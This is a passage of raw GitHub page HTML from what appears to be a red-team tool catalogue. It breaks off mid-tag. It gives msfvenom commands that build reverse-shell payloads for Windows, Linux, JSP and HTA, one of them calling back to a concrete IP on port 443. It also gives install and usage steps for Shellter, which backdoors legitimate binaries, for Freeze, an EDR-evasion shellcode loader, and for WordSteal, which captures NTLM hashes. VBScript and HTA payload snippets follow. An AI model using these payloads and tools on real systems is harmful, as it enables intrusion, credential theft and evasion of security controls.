data-snippet-clipboard-copy-content="msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe"><pre>msfvenom -p windows/shell/reverse_tcp LHOST=<span class="pl-k"><</span>IP<span class="pl-k">></span> LPORT=<span class="pl-k"><</span>PORT<span class="pl-k">></span> -f exe <span class="pl-k">></span> shell-x86.exe</pre></div> <p dir="auto"><strong>Linux:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="msfvenom -p linux/x86/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf"><pre>msfvenom -p linux/x86/shell/reverse_tcp LHOST=<span class="pl-k"><</span>IP<span class="pl-k">></span> LPORT=<span class="pl-k"><</span>PORT<span class="pl-k">></span> -f elf <span class="pl-k">></span> shell-x86.elf</pre></div> <p dir="auto"><strong>Java:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.jsp"><pre>msfvenom -p java/jsp_shell_reverse_tcp LHOST=<span class="pl-k"><</span>IP<span class="pl-k">></span> LPORT=<span class="pl-k"><</span>PORT<span class="pl-k">></span> -f raw <span class="pl-k">></span> shell.jsp</pre></div> <p dir="auto"><strong>HTA:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=443 -f hta-psh > shell.hta"><pre>msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=443 -f hta-psh <span class="pl-k">></span> shell.hta</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/192070870-2e65fc9f-6534-42e2-af27-9d8b54a82f0b.png"><img 
src="https://user-images.githubusercontent.com/100603074/192070870-2e65fc9f-6534-42e2-af27-9d8b54a82f0b.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://www.shellterproject.com/" rel="nofollow">Shellter</a></h3><a id="user-content-shellter" class="anchor" aria-label="Permalink: 🔙Shellter" href="#shellter"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Shellter is a dynamic shellcode injection tool, and the first truly dynamic PE infector ever created.</p> <p dir="auto">It can be used in order to inject shellcode into native Windows applications (currently 32-bit applications only).</p> <p dir="auto">Shellter takes advantage of the original structure of the PE file and doesn’t apply any modification such as changing memory access permissions in sections (unless the user wants), adding an extra section with RWE access, and whatever would look dodgy under an AV scan.</p> <p dir="auto">Full README information can be found <a href="https://www.shellterproject.com/Downloads/Shellter/Readme.txt" rel="nofollow">here</a>.</p> <p dir="auto"><strong>Install: (Kali)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" 
data-snippet-clipboard-copy-content="apt-get update apt-get install shellter"><pre>apt-get update apt-get install shellter</pre></div> <p dir="auto"><strong>Install: (Windows)</strong></p> <p dir="auto">Visit the <a href="https://www.shellterproject.com/download/" rel="nofollow">download page</a> and install.</p> <p dir="auto"><strong>Usage:</strong></p> <p dir="auto">Just pick a legit binary to backdoor and run Shellter.</p> <p dir="auto">Some nice tips can be found <a href="https://www.shellterproject.com/tipstricks/" rel="nofollow">here</a>.</p> <p dir="auto">Lots of community usage demos can be found <a href="https://www.shellterproject.com/shellter-community-demos/" rel="nofollow">here</a>.</p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/216729343-612cde48-0ce1-48e6-b342-5252193a974c.png"><img src="https://user-images.githubusercontent.com/100603074/216729343-612cde48-0ce1-48e6-b342-5252193a974c.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://www.kali.org/tools/shellter/images/shellter.png" rel="nofollow">https://www.kali.org/tools/shellter/images/shellter.png</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/optiv/Freeze">Freeze</a></h3><a id="user-content-freeze" class="anchor" aria-label="Permalink: 🔙Freeze" href="#freeze"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 
1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Freeze is a payload creation tool used for circumventing EDR security controls to execute shellcode in a stealthy manner.</p> <p dir="auto">Freeze utilizes multiple techniques to not only remove Userland EDR hooks, but to also execute shellcode in such a way that it circumvents other endpoint monitoring controls.</p> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone https://github.com/optiv/Freeze cd Freeze go build Freeze.go"><pre>git clone https://github.com/optiv/Freeze <span class="pl-c1">cd</span> Freeze go build Freeze.go</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content=" -I string Path to the raw 64-bit shellcode. -O string Name of output file (e.g. loader.exe or loader.dll). Depending on what file extension defined will determine if Freeze makes a dll or exe. -console Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature. -encrypt Encrypts the shellcode using AES 256 encryption -export string For DLL Loaders Only - Specify a specific Export function for a loader to have. -process string The name of process to spawn. This process has to exist in C:\Windows\System32\. Example 'notepad.exe' (default "notepad.exe") -sandbox Enables sandbox evasion by checking: Is Endpoint joined to a domain? Does the Endpoint have more than 2 CPUs? Does the Endpoint have more than 4 gigs of RAM? 
-sha256 Provides the SHA256 value of the loaders (This is useful for tracking)"><pre class="notranslate"><code> -I string Path to the raw 64-bit shellcode. -O string Name of output file (e.g. loader.exe or loader.dll). Depending on what file extension defined will determine if Freeze makes a dll or exe. -console Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature. -encrypt Encrypts the shellcode using AES 256 encryption -export string For DLL Loaders Only - Specify a specific Export function for a loader to have. -process string The name of process to spawn. This process has to exist in C:\Windows\System32\. Example 'notepad.exe' (default "notepad.exe") -sandbox Enables sandbox evasion by checking: Is Endpoint joined to a domain? Does the Endpoint have more than 2 CPUs? Does the Endpoint have more than 4 gigs of RAM? -sha256 Provides the SHA256 value of the loaders (This is useful for tracking) </code></pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/216729312-6e03f5d2-29a7-4190-8187-daecebfc6a9c.png"><img src="https://user-images.githubusercontent.com/100603074/216729312-6e03f5d2-29a7-4190-8187-daecebfc6a9c.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://www.blackhatethicalhacking.com/tools/freeze/" rel="nofollow">https://www.blackhatethicalhacking.com/tools/freeze/</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/0x09AL/WordSteal">WordSteal</a></h3><a id="user-content-wordsteal" class="anchor" aria-label="Permalink: 🔙WordSteal" href="#wordsteal"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 
0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">This script will create a Microsoft Word Document with a remote image, allowing for the capture of NTLM hashes from a remote victim endpoint.</p> <p dir="auto">Microsoft Word has the ability to include images from remote locations, including a remote image hosted on an attacker-controlled SMB server. This gives you the opportunity to listen for, and capture, NTLM hashes that are sent when an authenticated victim opens the Word document and renders the image.</p> <p dir="auto"><strong>Install:</strong></p> <div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="git clone https://github.com/0x09AL/WordSteal cd WordSteal"><pre class="notranslate"><code>git clone https://github.com/0x09AL/WordSteal cd WordSteal </code></pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Generate document containing 'test.jpg' and start listener ./main.py 127.0.0.1 test.jpg 1 # Generate document containing 'test.jpg' and do not start listener ./main.py 127.0.0.1 test.jpg 0\n"><pre><span class="pl-c"><span class="pl-c">#</span> Generate document containing 'test.jpg' and start listener</span> ./main.py 127.0.0.1 test.jpg 1 <span class="pl-c"><span class="pl-c">#</span> Generate document containing 'test.jpg' and do not start listener</span> ./main.py 127.0.0.1 test.jpg 0<span 
class="pl-cce">\n</span></pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/217653886-09bf9eba-a117-47b9-99b4-12fb2d73ef44.png"><img src="https://user-images.githubusercontent.com/100603074/217653886-09bf9eba-a117-47b9-99b4-12fb2d73ef44.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://pentestit.com/wordsteal-steal-ntlm-hashes-remotely/" rel="nofollow">https://pentestit.com/wordsteal-steal-ntlm-hashes-remotely/</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="http://undocumented.ntinternals.net/" rel="nofollow">NTAPI Undocumented Functions</a></h3><a id="user-content-ntapi-undocumented-functions" class="anchor" aria-label="Permalink: 🔙NTAPI Undocumented Functions" href="#ntapi-undocumented-functions"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">This site provides information on undocumented Windows internals, system calls, data structures, and other low-level details of the Windows operating system.</p> <p dir="auto">It can be a valuable resource for individuals who want to explore the internals of Windows for various purposes, including vulnerability analysis, exploit development, and privilege escalation.</p> <p 
dir="auto">When developing exploits, understanding the internals of the target system is crucial. This site can help develop exploits by leveraging the low-level undocumented aspects of Windows.</p> <p dir="auto"><strong>Usage:</strong></p> <p dir="auto">Visit <a href="http://undocumented.ntinternals.net/" rel="nofollow">http://undocumented.ntinternals.net/</a></p> <p dir="auto"><a target="_blank" rel="noopener noreferrer" href="https://private-user-images.githubusercontent.com/100603074/238468558-41b424f3-053c-440b-b0fd-235e95980d9a.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvMjM4NDY4NTU4LTQxYjQyNGYzLTA1M2MtNDQwYi1iMGZkLTIzNWU5NTk4MGQ5YS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0xZTYxYTllMzM4YjQ0YzFhMGQ4YWFiNDI4Zjk5MzVmNWE0NGYwYzIwZGVjZTc0NzQxNjEwNDMyNjM2NTIxYzlhJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.HDIb4rJn4kmn4hW2vKSlOm3SUxbcrQBmaXn9ic-uDBE"><img 
src="https://private-user-images.githubusercontent.com/100603074/238468558-41b424f3-053c-440b-b0fd-235e95980d9a.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvMjM4NDY4NTU4LTQxYjQyNGYzLTA1M2MtNDQwYi1iMGZkLTIzNWU5NTk4MGQ5YS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0xZTYxYTllMzM4YjQ0YzFhMGQ4YWFiNDI4Zjk5MzVmNWE0NGYwYzIwZGVjZTc0NzQxNjEwNDMyNjM2NTIxYzlhJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.HDIb4rJn4kmn4hW2vKSlOm3SUxbcrQBmaXn9ic-uDBE" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="http://undocumented.ntinternals.net/" rel="nofollow">http://undocumented.ntinternals.net/</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://codemachine.com/articles/kernel_callback_functions.html" rel="nofollow">Kernel Callback Functions</a></h3><a id="user-content-kernel-callback-functions" class="anchor" aria-label="Permalink: 🔙Kernel Callback Functions" href="#kernel-callback-functions"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 
0 0 2.83Z"></path></svg></a></div> <p dir="auto">This technical note provides a comprehensive list of all the APIs exported by the Windows Kernel for driver writers to register callback routines that are invoked by kernel components under various circumstances.</p> <p dir="auto">Most of these routines are documented in the Windows Driver Kit (WDK), but some of them are for use by in-box drivers.</p> <p dir="auto">The undocumented functions are described briefly, whereas the documented ones are just listed here for reference.</p> <p dir="auto"><strong>Usage:</strong></p> <p dir="auto">Visit <a href="https://codemachine.com/articles/kernel_callback_functions.html" rel="nofollow">https://codemachine.com/articles/kernel_callback_functions.html</a></p> <p dir="auto"><a target="_blank" rel="noopener noreferrer" href="https://private-user-images.githubusercontent.com/100603074/238468952-b7532b7d-1abc-4af6-be92-f6f78d24a788.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvMjM4NDY4OTUyLWI3NTMyYjdkLTFhYmMtNGFmNi1iZTkyLWY2Zjc4ZDI0YTc4OC5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT01MzAxMThiZmJiNThjODRlNjhhZjg0MGIxNTA1NjM2NzUwYjM5OWI3M2ExMWVjOTVhNGNmZWZiMjUyYWI5ODU1JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.Tt9OQSD5FulZC8wa8jzvl6vNGV4xwPqdbJk50WUnNLA"><img 
src="https://private-user-images.githubusercontent.com/100603074/238468952-b7532b7d-1abc-4af6-be92-f6f78d24a788.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvMjM4NDY4OTUyLWI3NTMyYjdkLTFhYmMtNGFmNi1iZTkyLWY2Zjc4ZDI0YTc4OC5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT01MzAxMThiZmJiNThjODRlNjhhZjg0MGIxNTA1NjM2NzUwYjM5OWI3M2ExMWVjOTVhNGNmZWZiMjUyYWI5ODU1JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.Tt9OQSD5FulZC8wa8jzvl6vNGV4xwPqdbJk50WUnNLA" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://codemachine.com" rel="nofollow">https://codemachine.com</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/S3cur3Th1sSh1t/OffensiveVBA">OffensiveVBA</a></h3><a id="user-content-offensivevba" class="anchor" aria-label="Permalink: 🔙OffensiveVBA" href="#offensivevba"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">A collection of offensive techniques, scripts and useful 
links for achieving code execution and defense evasion via office macros.</p> <p dir="auto"><strong>Usage:</strong></p> <p dir="auto">Visit <a href="https://github.com/S3cur3Th1sSh1t/OffensiveVBA#templates-in-this-repo">https://github.com/S3cur3Th1sSh1t/OffensiveVBA#templates-in-this-repo</a></p> <p dir="auto"><a target="_blank" rel="noopener noreferrer" href="https://private-user-images.githubusercontent.com/100603074/238468760-7f7ad942-48d7-42e7-a3cc-55ec84139058.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvMjM4NDY4NzYwLTdmN2FkOTQyLTQ4ZDctNDJlNy1hM2NjLTU1ZWM4NDEzOTA1OC5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1iMTY4YjI3NzE5NTUxMmIxZjM1NzA4ODQ3NWJmZWY1Zjc3ZGJkYjlkYmM3ZjA4M2VjNThkZjEwMWNmYjU0YzE0JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.a3c8B_beIWc5ltk0GN7Mcfmkgsbb2DJtWxEGwUvg1sA"><img src="https://private-user-images.githubusercontent.com/100603074/238468760-7f7ad942-48d7-42e7-a3cc-55ec84139058.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvMjM4NDY4NzYwLTdmN2FkOTQyLTQ4ZDctNDJlNy1hM2NjLTU1ZWM4NDEzOTA1OC5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1iMTY4YjI3NzE5NTUxMmIxZjM1NzA4ODQ3NWJmZWY1Zjc3ZGJkYjlkYmM3ZjA4M2VjNThkZjEwMWNmYjU0YzE0JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.a3c8B_beIWc5ltk0GN7Mcfmkgsbb2DJtWxEGwUvg1sA" alt="image" style="max-width: 100%;"></a></p> <p 
dir="auto"><em>Image used from <a href="https://github.com/S3cur3Th1sSh1t">https://github.com/S3cur3Th1sSh1t</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a>WSH</h3><a id="user-content-wsh" class="anchor" aria-label="Permalink: 🔙WSH" href="#wsh"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto"><strong>Creating payload:</strong></p> <div class="highlight highlight-source-vbnet notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="Set shell = WScript.CreateObject("Wscript.Shell") shell.Run("C:\Windows\System32\calc.exe " & WScript.ScriptFullName),0,True"><pre><span class="pl-k">Set</span> <span class="pl-smi">shell</span> <span class="pl-smi">=</span> <span class="pl-smi">WScript.CreateObject(</span><span class="pl-s">"Wscript.Shell"</span><span class="pl-smi">)</span> <span class="pl-smi">shell.Run(</span><span class="pl-s">"C:\Windows\System32\calc.exe "</span> <span class="pl-smi">&</span> <span class="pl-smi">WScript.ScriptFullName),</span><span class="pl-s">0</span><span class="pl-smi">,</span><span class="pl-k">True</span></pre></div> <p dir="auto"><strong>Execute:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="wscript 
payload.vbs cscript.exe payload.vbs wscript /e:VBScript payload.txt //If .vbs files are blacklisted"><pre>wscript payload.vbs cscript.exe payload.vbs wscript /e:VBScript payload.txt //If .vbs files are blacklisted</pre></div> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a>HTA</h3><a id="user-content-hta" class="anchor" aria-label="Permalink: 🔙HTA" href="#hta"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto"><strong>Creating payload:</strong></p> <div class="highlight highlight-text-html-basic notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="<html> <body> <script> var c= 'cmd.exe' new ActiveXObject('WScript.Shell').Run(c); </script> </body> </html>"><pre><span class="pl-kos"><</span><span 